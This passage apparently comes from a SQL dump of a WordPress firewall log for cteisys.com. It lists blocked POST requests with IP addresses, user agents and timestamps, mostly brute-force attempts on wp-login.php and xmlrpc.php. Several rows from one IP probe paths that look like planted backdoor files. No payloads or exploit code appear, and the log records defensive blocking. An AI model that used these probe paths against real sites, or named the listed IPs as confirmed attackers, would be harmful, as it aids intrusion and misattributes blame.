rv:66.0) Gecko\\/20100101 Firefox\\/66.0\"}','iKz5UFGAMOvwnm7ecCub49H0',0,1664353951.2170,466,'','POST',403,0,700,0,1,'',0),('188.166.183.39',3165042471,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','LI45YqNEp9BawzrRi76lbHXQ',0,1664354679.4507,1281,'','POST',403,0,600,0,1,'',0),('143.244.155.35',2415172387,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','Z1y7jbs2FMIYxAnhkeHUBEWi',0,1664354703.5692,1792,'','POST',403,0,600,0,1,'',0),('69.163.224.107',1168367723,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','gAOGikHFBTX41ywsf8pKbh3o',0,1664355799.7092,1423,'','POST',403,0,600,0,1,'',0),('82.165.86.198',1386567366,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','3h5Mi0fQk2UHVJxWoCTvK98j',0,1664356786.9671,17563,'','POST',403,0,515,0,1,'',0),('128.199.147.151',2160563095,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','2NT6wb8rjf7VFUuHlh9EiXkY',0,1664356795.9061,8636,'','POST',403,0,515,0,1,'',0),('188.166.103.30',3165021982,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','0qU735pl2betgOzyjnJVNmLw',0,1664356789.8833,14810,'','POST',403,0,515,0,1,'',0),('45.32.113.107',757100907,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','D3LF8rsnK2VhHUcbO07YdRWI',0,1664356811.4684,505,'','POST',403,0,515,0,1,'',0),('128.199.195.166',2160575398,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','xVLuYUfK0ZrnBvSX2EM5wo8N',0,1664356817.9302,573,'','POST',403,0,515,0,1,'',0),('167.71.184.141',2806495373,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','M04nx2rVyKIj7ZGDlQYWbce8',0,1664356823.3658,558,'','POST',403,0,515,0,1,'',0),('185.107.112.170',3110826154,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPod; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','fa4FBm075Lxli3N8nUtCjgdJ',0,1664356824.7984,520,'','POST',403,0,515,0,1,'',0),('51.89.228.130',861529218,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko\\/20050915 Firefox\\/1.0.7\"}','bn3y5BQjYNdt1v0CZAaoMxq8',0,1664356831.9833,544,'','POST',403,0,515,0,1,'',0),('139.99.125.19',2338553107,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','h5qvdGbilM8KCUrOPRcSA1w3',0,1664356832.7508,539,'','POST',403,0,515,0,1,'',0),('185.15.198.166',3104818854,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.138 Safari\\/537.36\"}','cegzH1nU4PTmjAlS6VykRF3O',0,1664356856.9906,1252,'','POST',403,0,515,0,1,'',0),('188.212.34.69',3168019013,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.109 Safari\\/537.36\"}','GgHDNrIRZwLtf7nTUc12B5h8',0,1664356873.4406,547,'','POST',403,0,600,0,1,'',0),('133.130.103.36',2239915812,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','Cra693bzMWy0FdvtqLOhSG75',0,1664356897.7755,515,'','POST',403,0,600,0,1,'',0),('47.110.72.238',795756782,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','4O8LN3HoKP2jJkmn5aVquTIh',0,1664357975.8386,17196,'','POST',403,0,600,0,1,'',0),('120.27.240.230',2015097062,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','gkuLMi0ty9BOSNK1fYVbcICd',0,1664357999.9531,542,'','POST',403,0,600,0,1,'',0),('148.72.214.194',2487801538,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.106 Safari\\/537.36\"}','HK9NaiYFrgPzZcsI2dVOn6tA',0,1664359075.0754,17256,'','POST',403,0,600,0,1,'',0),('175.178.125.173',2947710381,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.75 Safari\\/537.36\"}','OM2rYkzXVihK3Ic5Z64SFJvy',0,1664359100.8708,795,'','POST',403,0,600,0,1,'',0),('45.252.248.52',771553332,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPod; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','MBbSvQdn3pjrKVgL64tYzPax',0,1664359174.3642,2553,'','POST',403,0,515,0,1,'',0),('170.249.205.58',2868497722,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','BL6XhPyJe2k5g3Wq8jn4IZuV',0,1664359176.9441,599,'','POST',403,0,515,0,1,'',0),('109.235.66.248',1844134648,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','XebLWRdQ19l8GpMKYrfE5Hq3',0,1664359179.4287,533,'','POST',403,0,515,0,1,'',0),('103.8.12.105',1728580713,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.212 Safari\\/537.36\"}','kYFnCR3QzaiZvc4Is7MLyV5O',0,1664359183.0773,624,'','POST',403,0,515,0,1,'',0),('50.62.177.214',842969558,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','TlKn12myAuO7JadxpZ5BGfFo',0,1664359187.9248,1700,'','POST',403,0,515,0,1,'',0),('68.183.26.89',1152850521,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','oLr9aGBhpXTxEtIMcJWw6Yys',0,1664359191.4484,789,'','POST',403,0,515,0,1,'',0),('188.166.103.30',3165021982,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','l6aipgVfE8t0FWULYujmHB7O',0,1664359192.5981,796,'','POST',403,0,515,0,1,'',0),('201.236.28.16',3387694096,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:7.0.1) Gecko\\/20100101 Firefox\\/7.0.1\"}','Q8qe7pJHuamBohcNgXAi3YEV',0,1664359203.5326,2372,'','POST',403,0,515,0,1,'',0),('142.93.48.70',2388471878,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.76 Safari\\/537.36\"}','YsEQnbWviPm4Gj8hCfMTVoI3',0,1664359203.3519,2808,'','POST',403,0,515,0,1,'',0),('128.199.147.151',2160563095,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','OqcXkMNbiwSgYFA1Wzh6rPnE',0,1664359211.9661,775,'','POST',403,0,515,0,1,'',0),('152.89.196.13',2556019725,'','http://cteisys.com/wp-content/class-index-wordpress.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko\\/20100101 Firefox\\/68.0\"}','EK42ufTNPhXRAoO3xiwg8qZJ',0,1664359447.5568,453,'','POST',403,0,700,0,1,'',0),('209.141.56.13',3515693069,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 7_1_1 like Mac OS X) AppleWebKit\\/537.51.2 (KHTML, like Gecko) Version\\/7.0 Mobile\\/11D201 Safari\\/9537.53\"}','N5InhbUmLXKWcdrjSgivaYkl',0,1664359681.6465,1311,'','POST',403,0,600,0,1,'',0),('165.232.180.174',2783491246,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','C0kV9tYbX8aApwFEgilWBNdS',0,1664360206.5175,14802,'','POST',403,0,600,0,1,'',0),('120.25.104.120',2014931064,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.87 Safari\\/537.36\"}','5JHsSK2yp0E8rqdZc4AneV6f',0,1664360230.6892,634,'','POST',403,0,600,0,1,'',0),('179.188.47.107',3015454571,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','P36UFIzaZNLAc4eMVEuH2nRt',0,1664360337.4012,1996,'','POST',403,0,515,0,1,'',0),('185.102.88.47',3110492207,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','xlUSqP1fpKnYj2C8FZH0A5tI',0,1664360336.7868,2611,'','POST',403,0,515,0,1,'',0),('136.144.179.78',2291184462,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','2mWDEulzr0G7pvBZdyPVhxON',0,1664360343.9093,565,'','POST',403,0,515,0,1,'',0),('128.199.195.166',2160575398,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','xCUtsifrgJebRNAB5MK1lnPL',0,1664360351.2751,507,'','POST',403,0,515,0,1,'',0),('43.153.25.22',731453718,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','8Ge01vhkBSx6JA4tVXwzfQMF',0,1664360361.7647,16806,'','POST',403,0,515,0,1,'',0),('213.152.162.149',3583550101,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','M9dILo0tbArlK8pyz76cGDCx',0,1664361144.5180,1633,'','POST',403,0,515,0,1,'',0),('69.163.186.158',1168358046,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/59.0.3071.115 Safari\\/537.36\"}','fAkYx8G4NVHU70RrIBL1XPQs',0,1664361349.4281,3462,'','POST',403,0,600,0,1,'',0),('207.188.157.79',3485244751,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','rlTqNp1GZvcJCfLukI0hRKot',0,1664361374.8191,472,'','POST',403,0,600,0,1,'',0),('62.102.148.154',1046910106,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','RWGH4tnoe79iSPDYyAZqszlb',0,1664361991.6999,2118,'','POST',403,0,515,0,1,'',0),('94.231.86.20',1592219156,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.109 Safari\\/537.36\"}','L0KkZg5ClTXBFhdmDHzsMvj4',0,1664362485.2806,17341,'','POST',403,0,600,0,1,'',0),('167.71.141.164',2806484388,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','M6xXowEvBLgbhHj2snfYAQRd',0,1664362510.5471,504,'','POST',403,0,600,0,1,'',0),('39.103.157.70',661101894,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','6zmxPqQvYdgnfZykHtoEiue5',0,1664363617.8082,1628,'','POST',403,0,600,0,1,'',0),('85.191.40.94',1438591070,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','5P6zAFmsZD8bGYSQITvEkXfU',0,1664363642.2278,1329,'','POST',403,0,600,0,1,'',0),('188.68.47.69',3158585157,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.135 Safari\\/537.36\"}','j0T2FtE4hPOUfMCWGiSAkum9',0,1664364235.6929,10041,'','POST',403,0,515,0,1,'',0),('217.146.69.53',3650241845,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','Ih4BXgqrP5faCkvAmlHMy0QR',0,1664364238.2271,7521,'','POST',403,0,515,0,1,'',0),('176.9.113.101',2953408869,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','5Cs4ldhjioQNFuIf6keDBnyY',0,1664364248.3417,482,'','POST',403,0,515,0,1,'',0),('124.221.205.249',2094910969,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/83.0.4103.116 Safari\\/537.36\"}','QNBHKyOS9YVC7WlPTUdm3gen',0,1664364255.3300,525,'','POST',403,0,515,0,1,'',0),('185.107.112.126',3110826110,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','g9XGuQK3nprOPUFWLYVsdmiB',0,1664364262.2165,483,'','POST',403,0,515,0,1,'',0),('162.0.220.27',2717965339,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-N960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','g8KMvr7tif3kGJSjWqZwExVC',0,1664364267.7232,493,'','POST',403,0,515,0,1,'',0),('74.208.59.231',1255160807,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko\\/20100101 Firefox\\/44.0\"}','0GeMgKyQt5Pl8DW3UHOS2zo1',0,1664364268.4348,512,'','POST',403,0,515,0,1,'',0),('201.236.28.16',3387694096,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko\\/20100101 Firefox\\/85.0\"}','eIN8QGdC6DwYBT5tolsKxLu2',0,1664364273.0694,570,'','POST',403,0,515,0,1,'',0),('69.163.224.107',1168367723,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.84 Safari\\/537.36\"}','SutyKz3qv5pOJYG69N02BARe',0,1664364747.0763,18381,'','POST',403,0,600,0,1,'',0),('185.2.4.134',3103917190,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','yPN2MWcLgBuxtQkSIYwV9Zsi',0,1664364771.3858,1497,'','POST',403,0,600,0,1,'',0),('198.98.60.32',3328326688,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit\\/537.51.1 (KHTML, like Gecko) GSA\\/4.1.0.31802 Mobile\\/11D257 Safari\\/9537.53\"}','WfcaZBHrhl7u8dg93wYSKCAN',0,1664364838.1162,1377,'','POST',403,0,600,0,1,'',0),('51.159.155.6',866097926,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','KjoPErRgQ1ldAa7YnJUOCWmw',0,1664365879.5784,17641,'','POST',403,0,600,0,1,'',0),('68.183.71.174',1152862126,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','GF89tSKcmoxhR2Ov3rU5ugJp',0,1664365904.3325,686,'','POST',403,0,600,0,1,'',0),('188.166.103.30',3165021982,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q720) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','ZwNDOk0yHgxenC3LuSGb46fE',0,1664366470.7343,18637,'','POST',403,0,515,0,1,'',0),('82.156.45.135',1385966983,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','dSUlPephGyA8vYIsC6B1zRLt',0,1664366472.6473,16853,'','POST',403,0,515,0,1,'',0),('45.252.248.52',771553332,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','QEYpawZOILi2TnfrMkG4HhKo',0,1664366472.1852,17320,'','POST',403,0,515,0,1,'',0),('116.202.117.198',1959425478,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','NfLIpvaJ5MVTtE6r72czS4UP',0,1664366491.3454,544,'','POST',403,0,515,0,1,'',0),('198.252.105.20',3338430740,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko\\/20100101 Firefox\\/44.0\"}','ytAafE58ohUFLrjIz06qegTd',0,1664366495.3036,591,'','POST',403,0,515,0,1,'',0),('47.105.130.240',795443952,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','JMPgGiBqS6oQ3kXUe4dRcb2A',0,1664366498.2667,588,'','POST',403,0,515,0,1,'',0),('51.89.228.130',861529218,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.141 Safari\\/537.36\"}','cP07IsExhMClokiYutNSbLDz',0,1664366505.6753,1309,'','POST',403,0,515,0,1,'',0),('185.107.112.126',3110826110,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','NYqfrGl6RnjTtw2SU7Az5QvE',0,1664366507.8662,529,'','POST',403,0,515,0,1,'',0),('109.235.66.248',1844134648,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','kDgiB5rMP3TjLtCfuZHGbqhV',0,1664366516.3815,519,'','POST',403,0,515,0,1,'',0),('207.180.235.153',3484740505,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','YPOzpgBNcvbjd2MnrsISay96',0,1664366518.2650,651,'','POST',403,0,515,0,1,'',0),('97.74.82.165',1632260773,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko\\/20100101 Firefox\\/18.0\"}','MagzetpdXJKcksEoyOulriRL',0,1664366523.0075,639,'','POST',403,0,515,0,1,'',0),('120.78.15.126',2018381694,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36\"}','6QervaHozAVyStnG5fsW2Bxj',0,1664367018.6210,18737,'','POST',403,0,600,0,1,'',0),('103.130.218.189',1736628925,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/54.0.2840.99 Safari\\/537.36\"}','K2gX6EhDZN85iByHdmVTbrQe',0,1664367043.0172,550,'','POST',403,0,600,0,1,'',0),('152.89.196.13',2556019725,'','http://cteisys.com/wp-includes/class-index-wordpress.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','T1EAvYH6ongc9xlKS8NXCPGs',0,1664367746.6173,12073,'','POST',403,0,700,0,1,'',0),('124.153.66.86',2090418774,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/51.0.2704.106 Safari\\/537.36\"}','uedaJAhwXHybvLD5n9xR4C3g',0,1664368183.1221,17360,'','POST',403,0,600,0,1,'',0),('213.152.187.200',3583556552,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','F0gyWNiIK85X1r4vf9kAsdxV',0,1664368636.0553,18291,'','POST',403,0,515,0,1,'',0),('152.89.196.13',2556019725,'','http://cteisys.com/wp-content/themes/hestia/inc/core/class-core-hestia.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','1MoJFXeAUcD6StWCugv79ZBO',0,1664369187.6024,353,'','POST',403,0,700,0,1,'',0),('47.105.73.13',795429133,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','sSmZ8VAfIlgrc1hLxkBdjwy4',0,1664369293.3371,1472,'','POST',403,0,600,0,1,'',0),('207.180.235.153',3484740505,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','wGyOS1LdRbgoeWB7u3s52EhJ',0,1664369367.1579,7876,'','POST',403,0,515,0,1,'',0),('201.236.28.16',3387694096,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:40.0) Gecko\\/20100101 Firefox\\/40.0\"}','lmLx7iapMR8GfUTe6FANDYcH',0,1664369368.8662,6232,'','POST',403,0,515,0,1,'',0),('184.168.114.114',3098047090,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','cTgD6quKJp3hXkW7F5G9d8Lz',0,1664369375.0988,1307,'','POST',403,0,515,0,1,'',0),('103.117.212.32',1735775264,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','zowFAHXUqxn54M6LVeZ9cjrd',0,1664369390.4366,1292,'','POST',403,0,515,0,1,'',0),('152.89.196.13',2556019725,'','http://cteisys.com/wp-includes/class-wordpress-cloud.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','grZf16aAxq5wthoCEu7mikWM',0,1664369477.4826,305,'','POST',403,0,700,0,1,'',0),('50.62.177.214',842969558,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','jnWhGdA6rXIDBw8vUkYsOZ02',0,1664369985.7553,19468,'','POST',403,0,515,0,1,'',0),('116.202.117.198',1959425478,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) 